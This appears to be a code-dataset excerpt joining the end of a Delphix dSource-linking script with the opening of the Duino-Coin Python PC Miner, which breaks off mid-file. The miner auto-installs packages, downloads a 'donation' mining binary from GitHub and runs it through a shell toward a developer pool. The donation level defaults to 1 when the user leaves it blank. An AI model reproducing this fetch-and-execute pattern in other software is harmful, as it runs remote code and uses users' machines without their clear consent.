link_params.link_data.db_user = arguments["--db_user"]
link_params.link_data.number_of_connections = int(arguments["--num_connections"])
link_params.link_data.link_now = bool(arguments["--link_now"])
link_params.link_data.files_per_set = int(arguments["--files_per_set"])
link_params.link_data.rman_channels = int(arguments["--rman_channels"])
link_params.link_data.db_credentials = {
"type": "PasswordCredential",
"password": arguments["--db_passwd"],
}
link_params.link_data.sourcing_policy.logsync_enabled = True
# link_params.link_data.sourcing_policy.logsync_mode = 'ARCHIVE_REDO_MODE'
link_params.link_data.config = srcconfig_ref
try:
return database.link(dx_session_obj.server_session, link_params)
except (RequestError, HttpError) as e:
print_exception(
"Database link failed for {}:\n{}\n".format(arguments["--dsource_name"], e)
)
sys.exit(1)
def link_mssql_dsource(engine_name):
"""
Link an MSSQL dSource
"""
link_params = LinkParameters()
link_params.name = arguments["--dsource_name"]
link_params.link_data = MSSqlLinkData()
try:
env_obj_ref = find_obj_by_name(
dx_session_obj.server_session, environment, arguments["--stage_env"]
).reference
link_params.link_data.ppt_repository = find_dbrepo(
dx_session_obj.server_session,
"MSSqlInstance",
env_obj_ref,
arguments["--stage_instance"],
).reference
link_params.link_data.config = find_obj_by_name(
dx_session_obj.server_session, sourceconfig, arguments["--dsource_name"]
).reference
link_params.group = find_obj_by_name(
dx_session_obj.server_session, group, arguments["--dx_group"]
).reference
except DlpxException as e:
print_exception(
"Could not link {}: {}\n".format(arguments["--dsource_name"], e)
)
sys.exit(1)
if arguments["--backup_path"] != "auto":
link_params.link_data.shared_backup_location = arguments["--backup_path"]
if arguments["--backup_loc_passwd"]:
link_params.link_data.backup_location_credentials = {
"type": "PasswordCredential",
"password": arguments["--backup_loc_passwd"],
}
link_params.link_data.backup_location_user = arguments["--backup_loc_user"]
link_params.link_data.db_credentials = {
"type": "PasswordCredential",
"password": arguments["--db_passwd"],
}
link_params.link_data.db_user = arguments["--db_user"]
link_params.link_data.sourcing_policy = SourcingPolicy()
if arguments["--load_from_backup"]:
link_params.link_data.sourcing_policy.load_from_backup = True
if arguments["--sync_mode"]:
link_params.link_data.validated_sync_mode = arguments["sync_mode"]
if arguments["--logsync"]:
link_params.link_data.sourcing_policy.logsync_enabled = True
try:
database.link(dx_session_obj.server_session, link_params)
dx_session_obj.jobs[engine_name] = dx_session_obj.server_session.last_job
dx_session_obj.jobs[engine_name + "snap"] = get_running_job(
dx_session_obj.server_session,
find_obj_by_name(
dx_session_obj.server_session, database, arguments["--dsource_name"]
).reference,
)
except (HttpError, RequestError, JobError) as e:
print_exception(
"Database link failed for {}:\n{}\n".format(arguments["--dsource_name"], e)
)
def link_ase_dsource(engine_name):
"""
Link an ASE dSource
"""
link_params = LinkParameters()
link_params.name = arguments["--dsource_name"]
link_params.link_data = ASELinkData()
link_params.link_data.db_credentials = {
"type": "PasswordCredential",
"password": arguments["--ase_passwd"],
}
link_params.link_data.db_user = arguments["--ase_user"]
link_params.link_data.load_backup_path = arguments["--backup_path"]
if arguments["--bck_file"]:
link_params.link_data.sync_parameters = ASESpecificBackupSyncParameters()
bck_files = (arguments["--bck_file"]).split(" ")
link_params.link_data.sync_parameters.backup_files = bck_files
elif arguments["--create_bckup"]:
link_params.link_data.sync_parameters = ASENewBackupSyncParameters()
else:
link_params.link_data.sync_parameters = ASELatestBackupSyncParameters()
try:
link_params.group = find_obj_by_name(
dx_session_obj.server_session, group, arguments["--dx_group"]
).reference
env_user_ref = link_params.link_data.stage_user = find_obj_by_name(
dx_session_obj.server_session, environment, arguments["--env_name"]
).primary_user
link_params.link_data.staging_host_user = env_user_ref
link_params.link_data.source_host_user = env_user_ref
link_params.link_data.config = find_obj_by_name(
dx_session_obj.server_session, sourceconfig, arguments["--src_config"]
).reference
link_params.link_data.staging_repository = find_obj_by_name(
dx_session_obj.server_session, repository, arguments["--stage_repo"]
).reference
except DlpxException as e:
print_exception(
"Could not link {}: {}\n".format(arguments["--dsource_name"], e)
)
sys.exit(1)
try:
dsource_ref = database.link(dx_session_obj.server_session, link_params)
dx_session_obj.jobs[engine_name] = dx_session_obj.server_session.last_job
dx_session_obj.jobs[engine_name + "snap"] = get_running_job(
dx_session_obj.server_session,
find_obj_by_name(
dx_session_obj.server_session, database, arguments["--dsource_name"]
).reference,
)
print("{} sucessfully linked {}".format(
dsource_ref, arguments["--dsource_name"]
))
except (RequestError, HttpError) as e:
print_exception(
"Database link failed for {}:\n{}".format(arguments["--dsource_name"], e)
)
def run_async(func):
"""
http://code.activestate.com/recipes/576684-simple-threading-decorator/
run_async(func)
function decorator, intended to make "func" run in a separate
thread (asynchronously).
Returns the created Thread object
E.g.:
@run_async
def task1():
do_something
@run_async
def task2():
do_something_too
t1 = task1()
t2 = task2()
...
t1.join()
t2.join()
"""
from threading import Thread
from functools import wraps
@wraps(func)
def async_func(*args, **kwargs):
func_hl = Thread(target=func, args=args, kwargs=kwargs)
func_hl.start()
return func_hl
return async_func
@run_async
def main_workflow(engine):
"""
This function actually runs the jobs.
Use the @run_async decorator to run this function asynchronously.
This allows us to run against multiple Delphix Engine simultaneously
engine: Dictionary of engines
"""
jobs = {}
try:
# Setup the connection to the Delphix Engine
dx_session_obj.serversess(
engine["ip_address"], engine["username"], engine["password"]
)
except DlpxException as e:
print_exception(
"\nERROR: Engine {} encountered an error while"
"{}:\n{}\n".format(
dx_session_obj.dlpx_engines["hostname"], arguments["--target"], e
)
)
sys.exit(1)
thingstodo = ["thingtodo"]
try:
with dx_session_obj.job_mode(single_thread):
while len(dx_session_obj.jobs) > 0 or len(thingstodo) > 0:
if len(thingstodo) > 0:
if arguments["--type"].lower() == "oracle":
create_ora_sourceconfig(engine["hostname"])
elif arguments["--type"].lower() == "sybase":
link_ase_dsource(engine["hostname"])
elif arguments["--type"].lower() == "mssql":
link_mssql_dsource(engine["hostname"])
thingstodo.pop()
# get all the jobs, then inspect them
i = 0
for j in dx_session_obj.jobs.keys():
job_obj = job.get(
dx_session_obj.server_session, dx_session_obj.jobs[j]
)
print_debug(job_obj)
print_info(
"{}: Provisioning dSource: {}".format(
engine["hostname"], job_obj.job_state
)
)
if job_obj.job_state in ["CANCELED", "COMPLETED", "FAILED"]:
# If the job is in a non-running state, remove it
# from the
# running jobs list.
del dx_session_obj.jobs[j]
elif job_obj.job_state in "RUNNING":
# If the job is in a running state, increment the
# running job count.
i += 1
print_info("{}: {:d} jobs running.".format(engine["hostname"], i))
# If we have running jobs, pause before repeating the
# checks.
if len(dx_session_obj.jobs) > 0:
sleep(float(arguments["--poll"]))
except (HttpError, RequestError, JobError, DlpxException) as e:
print_exception(
"ERROR: Could not complete ingesting the source " "data:\n{}".format(e)
)
sys.exit(1)
def run_job():
"""
This function runs the main_workflow aynchronously against all the servers
specified
"""
# Create an empty list to store threads we create.
threads = []
engine = None
# If the --all argument was given, run against every engine in dxtools.conf
if arguments["--all"]:
print_info("Executing against all Delphix Engines in the dxtools.conf")
try:
# For each server in the dxtools.conf...
for delphix_engine in dx_session_obj.dlpx_engines:
engine = dx_session_obj[delphix_engine]
# Create a new thread and add it to the list.
threads.append(main_workflow(engine))
except DlpxException as e:
print("Error encountered in run_job():\n%s" % (e))
sys.exit(1)
elif arguments["--all"] is False:
# Else if the --engine argument was given, test to see if the engine
# exists in dxtools.conf
if arguments["--engine"]:
try:
engine = dx_session_obj.dlpx_engines[arguments["--engine"]]
print_info(
"Executing against Delphix Engine: {}\n".format(
(arguments["--engine"])
)
)
except (DlpxException, RequestError, KeyError) as e:
raise DlpxException(
"\nERROR: Delphix Engine {} cannot be "
"found in {}. Please check your value "
"and try again. Exiting.\n".format(
arguments["--engine"], config_file_path
)
)
else:
# Else search for a default engine in the dxtools.conf
for delphix_engine in dx_session_obj.dlpx_engines:
if dx_session_obj.dlpx_engines[delphix_engine]["default"] == "true":
engine = dx_session_obj.dlpx_engines[delphix_engine]
print_info(
"Executing against the default Delphix Engine "
"in the dxtools.conf: %s"
% (dx_session_obj.dlpx_engines[delphix_engine]["hostname"])
)
break
if engine == None:
raise DlpxException("\nERROR: No default engine found. Exiting")
# run the job against the engine
threads.append(main_workflow(engine))
# For each thread in the list...
for each in threads:
# join them back together so that we wait for all threads to complete
# before moving on
each.join()
def time_elapsed():
"""
This function calculates the time elapsed since the beginning of the script.
Call this anywhere you want to note the progress in terms of time
"""
elapsed_minutes = round((time() - time_start) / 60, +1)
return elapsed_minutes
def main(argv):
# We want to be able to call on these variables anywhere in the script.
global single_thread
global usebackup
global time_start
global config_file_path
global database_name
global dx_session_obj
global debug
if arguments["--debug"]:
debug = True
try:
dx_session_obj = GetSession()
logging_est(arguments["--logdir"])
print_debug(arguments)
time_start = time()
engine = None
single_thread = False
config_file_path = arguments["--config"]
# Parse the dxtools.conf and put it into a dictionary
dx_session_obj.get_config(config_file_path)
# This is the function that will handle processing main_workflow for
# all the servers.
run_job()
elapsed_minutes = time_elapsed()
print_info(
"script took {} minutes to get this far.".format(str(elapsed_minutes))
)
# Here we handle what we do when the unexpected happens
except SystemExit as e:
"""
This is what we use to handle our sys.exit(#)
"""
sys.exit(e)
except HttpError as e:
"""
We use this exception handler when our connection to Delphix fails
"""
print_exception(
"Connection failed to the Delphix Engine"
"Please check the ERROR message below:\n{}".format(e)
)
sys.exit(1)
except JobError as e:
"""
We use this exception handler when a job fails in Delphix so that
we have actionable data
"""
elapsed_minutes = time_elapsed()
print_exception("A job failed in the Delphix Engine")
print_info(
"{} took {:.2f} minutes to get this far:\n{}\n".format(
basename(__file__), elapsed_minutes, e
)
)
sys.exit(3)
except KeyboardInterrupt:
"""
We use this exception handler to gracefully handle ctrl+c exits
"""
print_debug("You sent a CTRL+C to interrupt the process")
elapsed_minutes = time_elapsed()
print_info(
"{} took {:.2f} minutes to get this far\n".format(
basename(__file__), elapsed_minutes
)
)
except:
"""
Everything else gets caught here
"""
print_exception(sys.exc_info()[0])
elapsed_minutes = time_elapsed()
print_info(
"{} took {:.2f} minutes to get this far\n".format(
basename(__file__), elapsed_minutes
)
)
sys.exit(1)
if __name__ == "__main__":
try:
# Grab our arguments from the doc at the top of the script
arguments = docopt(__doc__, version=basename(__file__) + " " + VERSION)
# Feed our arguments to the main function, and off we go!
main(arguments)
except DocoptExit as e:
# print 'Exited because options were not specified: {}\n'.format(e)
print (e.message)
|
PC_Miner.py | #!/usr/bin/env python3
##########################################
# Duino-Coin Python PC Miner (v2.4)
# https://github.com/revoxhere/duino-coin
# Distributed under MIT license
# © Duino-Coin Community 2019-2021
##########################################
# Import libraries
import sys
from configparser import ConfigParser
from datetime import datetime
from hashlib import sha1
from json import load as jsonload
from locale import LC_ALL, getdefaultlocale, getlocale, setlocale
from os import _exit, execl, mkdir
from os import name as osname
from os import path, system
from pathlib import Path
from platform import system as plsystem
from re import sub
from signal import SIGINT, signal
from socket import socket
from statistics import mean
from subprocess import DEVNULL, Popen, check_call
from threading import Thread as thrThread
from time import ctime, sleep, strptime, time
def install(package):
# Install pip package automatically
check_call([sys.executable, "-m", "pip", "install", package])
execl(sys.executable, sys.executable, * sys.argv)
def now():
# Return datetime object
return datetime.now()
try:
# Check if cpuinfo is installed
import cpuinfo
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Cpuinfo is not installed. "
+ "Miner will try to install it. "
+ "If it fails, please manually install \"py-cpuinfo\"."
+ "\nIf you can\'t install it, use the Minimal-PC_Miner.")
install("py-cpuinfo")
try:
# Check if colorama is installed
from colorama import Back, Fore, Style, init
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Colorama is not installed. "
+ "Miner will try to install it. "
+ "If it fails, please manually install \"colorama\"."
+ "\nIf you can\'t install it, use the Minimal-PC_Miner.")
install("colorama")
try:
# Check if requests is installed
import requests
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Requests is not installed. "
+ "Miner will try to install it. "
+ "If it fails, please manually install \"requests\"."
+ "\nIf you can\'t install it, use the Minimal-PC_Miner.")
install("requests")
try:
# Check if pypresence is installed
from pypresence import Presence
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Pypresence is not installed. "
+ "Miner will try to install it. "
+ "If it fails, please manually install \"pypresence\"."
+ "\nIf you can\'t install it, use the Minimal-PC_Miner.")
install("pypresence")
try:
# Check if xxhash is installed
import xxhash
xxhash_enabled = True
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Xxhash is not installed. "
+ "Continuing without xxhash support.")
xxhash_enabled = False
# Global variables
minerVersion = "2.4" # Version number
timeout = 15 # Socket timeout
resourcesFolder = "PCMiner_" + str(minerVersion) + "_resources"
donatorrunning = False
debug = "n"
rigIdentifier = "None"
requestedDiff = "NET"
algorithm = "DUCO-S1"
serveripfile = ("https://raw.githubusercontent.com/"
+ "revoxhere/"
+ "duino-coin/gh-pages/"
+ "serverip.txt") # Serverip file
config = ConfigParser()
donationlevel = 0
thread = []
totalhashrate_mean = []
Service = False
# Create resources folder if it doesn't exist
if not path.exists(resourcesFolder):
mkdir(resourcesFolder)
# Check if languages file exists
if not Path(resourcesFolder + "/langs.json").is_file():
url = ("https://raw.githubusercontent.com/"
+ "revoxhere/"
+ "duino-coin/master/Resources/"
+ "PC_Miner_langs.json")
r = requests.get(url)
with open(resourcesFolder + "/langs.json", "wb") as f:
f.write(r.content)
# Load language file
with open(resourcesFolder + "/langs.json", "r", encoding="utf8") as lang_file:
lang_file = jsonload(lang_file)
# OS X invalid locale hack
if plsystem() == "Darwin":
if getlocale()[0] is None:
setlocale(LC_ALL, "en_US.UTF-8")
# Check if miner is configured, if it isn't, autodetect language
if not Path(resourcesFolder + "/Miner_config.cfg").is_file():
locale = getdefaultlocale()[0]
if locale.startswith("es"):
lang = "spanish"
elif locale.startswith("pl"):
lang = "polish"
elif locale.startswith("fr"):
lang = "french"
elif locale.startswith("ru"):
lang = "russian"
elif locale.startswith("de"):
lang = "german"
elif locale.startswith("tr"):
lang = "turkish"
elif locale.startswith("zh"):
lang = "chinese_simplified"
else:
lang = "english"
else:
# Read language variable from configfile
try:
config.read(resourcesFolder + "/Miner_config.cfg")
lang = config["miner"]["language"]
except Exception:
# If it fails, fallback to english
lang = "english"
def getString(string_name):
# Get string form language file
if string_name in lang_file[lang]:
return lang_file[lang][string_name]
elif string_name in lang_file["english"]:
return lang_file["english"][string_name]
else:
return "String not found: " + string_name
def debugOutput(text):
# Debug output
if debug == "y":
print(now().strftime(Style.DIM + "%H:%M:%S.%f ") + "DEBUG: " + text)
def title(title):
# Set window title
if osname == "nt":
# Windows systems
system("title " + title)
else:
# Most standard terminals
print("\33]0;" + title + "\a", end="")
sys.stdout.flush()
def handler(signal_received, frame):
# SIGINT handler
if current_process().name == "MainProcess":
prettyPrint(
"sys0",
getString("sigint_detected")
+ Style.NORMAL
+ Fore.RESET
+ getString("goodbye"),
"warning")
try:
# Close previous socket connection (if any)
socket.close()
except Exception:
pass
_exit(0)
# Enable signal handler
signal(SIGINT, handler)
def Greeting():
# Greeting message
global greeting
print(Style.RESET_ALL)
if requestedDiff == "LOW":
diffName = getString("low_diff_short")
elif requestedDiff == "MEDIUM":
diffName = getString("medium_diff_short")
else:
diffName = getString("net_diff_short")
current_hour = strptime(ctime(time())).tm_hour
if current_hour < 12:
greeting = getString("greeting_morning")
elif current_hour == 12:
greeting = getString("greeting_noon")
elif current_hour > 12 and current_hour < 18:
greeting = getString("greeting_afternoon")
elif current_hour >= 18:
greeting = getString("greeting_evening")
else:
greeting = getString("greeting_back")
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Fore.YELLOW
+ Style.BRIGHT
+ getString("banner")
+ Style.RESET_ALL
+ Fore.MAGENTA
+ " (v"
+ str(minerVersion)
+ ") "
+ Fore.RESET
+ "2019-2021")
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.YELLOW
+ "https://github.com/revoxhere/duino-coin")
try:
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ "CPU: "
+ Style.BRIGHT
+ Fore.YELLOW
+ str(threadcount)
+ "x "
+ str(cpu["brand_raw"]))
except Exception as e:
debugOutput("Error displaying CPU message: " + str(e))
if osname == "nt" or osname == "posix":
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ getString("donation_level")
+ Style.BRIGHT
+ Fore.YELLOW
+ str(donationlevel))
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ getString("algorithm")
+ Style.BRIGHT
+ Fore.YELLOW
+ algorithm
+ " @ "
+ diffName)
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ getString("rig_identifier")
+ Style.BRIGHT
+ Fore.YELLOW
+ rigIdentifier)
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ ("Running as service: ")
+ Style.BRIGHT
+ Fore.YELLOW
+ str(Service))
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ str(greeting)
+ ", "
+ Style.BRIGHT
+ Fore.YELLOW
+ str(username)
+ "!\n")
if osname == "nt":
# Initial miner executable section
if not Path(resourcesFolder + "/Donate_executable.exe").is_file():
debugOutput(
"OS is Windows, downloading developer donation executable")
url = ("https://github.com/"
+ "revoxhere/"
+ "duino-coin/blob/useful-tools/"
+ "DonateExecutableWindows.exe?raw=true")
r = requests.get(url)
with open(resourcesFolder + "/Donate_executable.exe", "wb") as f:
f.write(r.content)
elif osname == "posix":
# Initial miner executable section
if not Path(resourcesFolder + "/Donate_executable").is_file():
debugOutput(
"OS is Windows, downloading developer donation executable")
url = ("https://github.com/"
+ "revoxhere/"
+ "duino-coin/blob/useful-tools/"
+ "DonateExecutableLinux?raw=true")
r = requests.get(url)
with open(resourcesFolder + "/Donate_executable", "wb") as f:
f.write(r.content)
def loadConfig():
# Config loading section
global username
global efficiency
global donationlevel
global debug
global threadcount
global requestedDiff
global rigIdentifier
global lang
global algorithm
# Initial configuration
if not Path(resourcesFolder + "/Miner_config.cfg").is_file():
print(
Style.BRIGHT
+ getString("basic_config_tool")
+ resourcesFolder
+ getString("edit_config_file_warning"))
print(
Style.RESET_ALL
+ getString("dont_have_account")
+ Fore.YELLOW
+ getString("wallet")
+ Fore.RESET
+ getString("register_warning"))
username = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_username")
+ Fore.RESET
+ Style.BRIGHT)
if xxhash_enabled:
print(
Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ "1"
+ Style.NORMAL
+ " - DUCO-S1")
print(
Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ "2"
+ Style.NORMAL
+ " - XXHASH")
algorithm = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_algorithm")
+ Fore.RESET
+ Style.BRIGHT)
else:
algorithm = "1"
efficiency = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_intensity")
+ Fore.RESET
+ Style.BRIGHT)
threadcount = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_threads")
+ str(cpu_count())
+ "): "
+ Fore.RESET
+ Style.BRIGHT)
print(
Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ "1"
+ Style.NORMAL
+ " - "
+ getString("low_diff"))
print(
Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ "2"
+ Style.NORMAL
+ " - "
+ getString("medium_diff"))
print(
Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ "3"
+ Style.NORMAL
+ " - "
+ getString("net_diff"))
requestedDiff = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_difficulty")
+ Fore.RESET
+ Style.BRIGHT)
rigIdentifier = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_rig_identifier")
+ Fore.RESET
+ Style.BRIGHT)
if rigIdentifier == "y" or rigIdentifier == "Y":
rigIdentifier = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_rig_name")
+ Fore.RESET
+ Style.BRIGHT)
else:
rigIdentifier = "None"
donationlevel = "0"
if osname == "nt" or osname == "posix":
donationlevel = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_donation_level")
+ Fore.RESET
+ Style.BRIGHT)
# Check wheter efficiency is correct
efficiency = sub(r"\D", "", efficiency)
if efficiency == "":
efficiency = 95
elif float(efficiency) > int(100):
efficiency = 100
elif float(efficiency) < int(1):
efficiency = 1
# Check wheter threadcount is correct
threadcount = sub(r"\D", "", threadcount)
if threadcount == "":
threadcount = cpu_count()
elif int(threadcount) > int(10):
threadcount = 10
elif int(threadcount) < int(1):
threadcount = 1
# Check wheter algo setting is correct
if algorithm == "2":
algorithm = "XXHASH"
else:
algorithm = "DUCO-S1"
# Check wheter diff setting is correct
if requestedDiff == "1":
requestedDiff = "LOW"
elif requestedDiff == "2":
requestedDiff = "MEDIUM"
else:
requestedDiff = "NET"
# Check wheter donationlevel is correct
donationlevel = sub(r"\D", "", donationlevel)
if donationlevel == "":
donationlevel = 1
elif float(donationlevel) > int(5):
donationlevel = 5
elif float(donationlevel) < int(0):
donationlevel = 0
# Format data
config["miner"] = {
"username": username,
"efficiency": efficiency,
"threads": threadcount,
"requestedDiff": requestedDiff,
"donate": donationlevel,
"identifier": rigIdentifier,
"algorithm": algorithm,
"language": lang,
"debug": "n"}
# Write data to configfile
with open(resourcesFolder + "/Miner_config.cfg", "w") as configfile:
config.write(configfile)
# Calulate efficiency for later use with sleep function
efficiency = (100 - float(efficiency)) * 0.01
print(Style.RESET_ALL + getString("config_saved"))
else:
# If config already exists, load data from it
config.read(resourcesFolder + "/Miner_config.cfg")
username = config["miner"]["username"]
efficiency = config["miner"]["efficiency"]
threadcount = config["miner"]["threads"]
requestedDiff = config["miner"]["requestedDiff"]
donationlevel = config["miner"]["donate"]
algorithm = config["miner"]["algorithm"]
rigIdentifier = config["miner"]["identifier"]
debug = config["miner"]["debug"]
# Calulate efficiency for use with sleep function
efficiency = (100 - float(efficiency)) * 0.01
def Donate():
global donationlevel
global donatorrunning
global donateExecutable
if osname == "nt":
cmd = (
"cd "
+ resourcesFolder
+ "& Donate_executable.exe "
+ "-o stratum+tcp://xmg.minerclaim.net:7008 "
+ "-u revox.donate "
+ "-p x -s 4 -e ")
elif osname == "posix":
cmd = (
"cd "
+ resourcesFolder
+ "&& chmod +x Donate_executable "
+ "&& ./Donate_executable "
+ "-o stratum+tcp://xmg.minerclaim.net:7008 "
+ "-u revox.donate "
+ "-p x -s 4 -e ")
if int(donationlevel) <= 0:
prettyPrint(
"sys0",
Fore.YELLOW
+ getString("free_network_warning")
+ getString("donate_warning")
+ Fore.GREEN
+ "https://duinocoin.com/donate"
+ Fore.YELLOW
+ getString("learn_more_donate"),
"warning")
sleep(10)
elif donatorrunning == False:
if int(donationlevel) == 5:
cmd += "95"
elif int(donationlevel) == 4:
cmd += "75"
elif int(donationlevel) == 3:
cmd += "50"
elif int(donationlevel) == 2:
cmd += "20"
elif int(donationlevel) == 1:
cmd += "10"
if int(donationlevel) > 0:
debugOutput(getString("starting_donation"))
donatorrunning = True
# Launch CMD as subprocess
donateExecutable = Popen(
cmd, shell=True, stderr=DEVNULL)
prettyPrint(
"sys0",
getString("thanks_donation"),
"warning")
def ducos1(
lastBlockHash,
expectedHash,
difficulty):
# DUCO-S1 algorithm
# Measure starting time
timeStart = time()
base_hash = sha1(str(lastBlockHash).encode('ascii'))
temp_hash = None
# Loop from 1 too 100*diff
for ducos1res in range(100 * int(difficulty) + 1):
# Generate hash
temp_hash = base_hash.copy()
temp_hash.update(str(ducos1res).encode('ascii'))
ducos1 = temp_hash.hexdigest()
# Check if result was found
if ducos1 == expectedHash:
# Measure finish time
timeStop = time()
# Calculate hashrate
timeDelta = timeStop - timeStart
hashrate = ducos1res / timeDelta
return [ducos1res, hashrate]
def ducos1xxh(
lastBlockHash,
expectedHash,
difficulty):
# XXHASH algorithm
# Measure starting time
timeStart = time()
# Loop from 1 too 100*diff
for ducos1xxres in range(100 * int(difficulty) + 1):
# Generate hash
ducos1xx = xxhash.xxh64(
str(lastBlockHash) + str(ducos1xxres), seed=2811)
ducos1xx = ducos1xx.hexdigest()
# Check if result was found
if ducos1xx == expectedHash:
# Measure finish time
timeStop = time()
# Calculate hashrate
timeDelta = timeStop - timeStart
hashrate = ducos1xxres / timeDelta
return [ducos1xxres, hashrate]
def Thread(
threadid,
accepted,
rejected,
requestedDiff,
khashcount,
username,
efficiency,
rigIdentifier,
algorithm,
hashrates_list,
totalhashrate_mean):
# Mining section for every thread
while True:
# Grab server IP and port
while True:
try:
# Use request to grab data from raw github file
res = requests.get(serveripfile, data=None)
if res.status_code == 200:
# Read content and split into lines
content = (res.content.decode().splitlines())
# Line 1 = IP
masterServer_address = content[0]
# Line 2 = port
masterServer_port = content[1]
debugOutput(
"Retrieved pool IP: "
+ masterServer_address
+ ":"
+ str(masterServer_port))
break
except Exception as e:
# If there was an error with grabbing data from GitHub
prettyPrint(
"net"
+ str(threadid),
getString("data_error")
+ Style.NORMAL
+ Fore.RESET
+ " (git err: "
+ str(e)
+ ")",
"error")
debugOutput("GitHub error: " + str(e))
sleep(10)
# Connect to the server
while True:
try:
soc = socket()
# Establish socket connection to the server
soc.connect((str(masterServer_address),
int(masterServer_port)))
soc.settimeout(timeout)
serverVersion = soc.recv(3).decode().rstrip(
"\n") # Get server version
debugOutput("Server version: " + serverVersion)
if (float(serverVersion) <= float(minerVersion)
and len(serverVersion) == 3):
# If miner is up-to-date, display a message and continue
prettyPrint(
"net"
+ str(threadid),
getString("connected")
+ Fore.RESET
+ Style.NORMAL
+ getString("connected_server")
+ str(serverVersion)
+ ")",
"success")
break
else:
# Miner is outdated
prettyPrint(
"sys"
+ str(threadid),
getString("outdated_miner")
+ minerVersion
+ ") -"
+ getString("server_is_on_version")
+ serverVersion
+ Style.NORMAL
+ Fore.RESET
+ getString("update_warning"),
"warning")
break
except Exception as e:
# Socket connection error
prettyPrint(
"net"
+ str(threadid),
getString("connecting_error")
+ Style.NORMAL
+ Fore.RESET
+ " (net err: "
+ str(e)
+ ")",
"error")
debugOutput("Connection error: " + str(e))
sleep(10)
if algorithm == "XXHASH":
using_algo = getString("using_algo_xxh")
else:
using_algo = getString("using_algo")
prettyPrint(
"sys"
+ str(threadid),
getString("mining_thread")
+ str(threadid)
+ getString("mining_thread_starting")
+ Style.NORMAL
+ Fore.RESET
+ using_algo
+ Fore.YELLOW
+ str(int(100 - efficiency * 100))
+ "% "
+ getString("efficiency"),
"success")
# Mining section
while True:
try:
# If efficiency lower than 100...
if float(100 - efficiency * 100) < 100:
# ...sleep some time
sleep(float(efficiency * 5))
while True:
# Ask the server for job
if algorithm == "XXHASH":
soc.send(bytes(
"JOBXX,"
+ str(username)
+ ","
+ str(requestedDiff),
encoding="utf8"))
else:
soc.send(bytes(
"JOB,"
+ str(username)
+ ","
+ str(requestedDiff),
encoding="utf8"))
job = soc.recv(128).decode().rstrip("\n")
job = job.split(",") # Get work from pool
debugOutput("Received: " + str(job))
if job[1] == "This user doesn't exist":
prettyPrint(
"cpu"
+ str(threadid),
getString("mining_user")
+ str(username)
+ getString("mining_not_exist")
+ Style.NORMAL
+ Fore.RESET
+ getString("mining_not_exist_warning"),
"error")
sleep(10)
elif job[0] and job[1] and job[2]:
diff = int(job[2])
debugOutput(str(threadid) +
"Job received: "
+ str(job))
# If job received, continue to hashing algo
break
while True:
# Call DUCOS-1 hasher
computetimeStart = time()
if algorithm == "XXHASH":
algo_back_color = Back.CYAN
result = ducos1xxh(job[0], job[1], diff)
else:
algo_back_color = Back.YELLOW
result = ducos1(job[0], job[1], diff)
computetimeStop = time()
# Measure compute time
computetime = computetimeStop - computetimeStart
# Convert it to miliseconds
computetime = computetime
# Read result from ducos1 hasher
ducos1res = result[0]
debugOutput("Thread "
+ str(threadid)
+ ": result found: "
+ str(ducos1res))
# Convert H/s to kH/s
threadhashcount = int(result[1] / 1000)
# Add this thread's hash counter
# to the global hashrate counter
hashrates_list[threadid] = threadhashcount
# Calculate total hashrate of all thrads
sharehashrate = 0
for thread in hashrates_list.keys():
sharehashrate += hashrates_list[thread]
totalhashrate_mean.append(sharehashrate)
# Get average from the last 20 hashrate measurements
totalhashrate = mean(totalhashrate_mean[-20:])
while True:
# Send result of hashing algorithm to the server
soc.send(bytes(
str(ducos1res)
+ ","
+ str(threadhashcount * 1000)
+ ","
+ "Official PC Miner ("
+ str(algorithm)
+ ") v"
+ str(minerVersion)
+ ","
+ str(rigIdentifier),
encoding="utf8"))
responsetimetart = now()
# Get feedback
feedback = soc.recv(8).decode().rstrip("\n")
responsetimestop = now()
# Measure server ping
ping = str(int(
(responsetimestop - responsetimetart).microseconds
/ 1000))
debugOutput("Thread "
+ str(threadid)
+ ": Feedback received: "
+ str(feedback)
+ " Ping: "
+ str(ping))
if totalhashrate > 800:
# Format hashcount to MH/s
formattedhashcount = str(
"%03.2f" % round(totalhashrate / 1000, 2)
+ " MH/s")
else:
# Stay with kH/s
formattedhashcount = str(
"%03.0f" % float(totalhashrate)
+ " kH/s")
if feedback == "GOOD":
# If result was correct
accepted.value += 1
# title breaks running as systemd service
if not Service:
title(
getString("duco_python_miner")
+ str(minerVersion)
+ ") - "
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ getString("accepted_shares"))
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ algo_back_color
+ Fore.RESET
+ " cpu"
+ str(threadid)
+ " "
+ Back.RESET
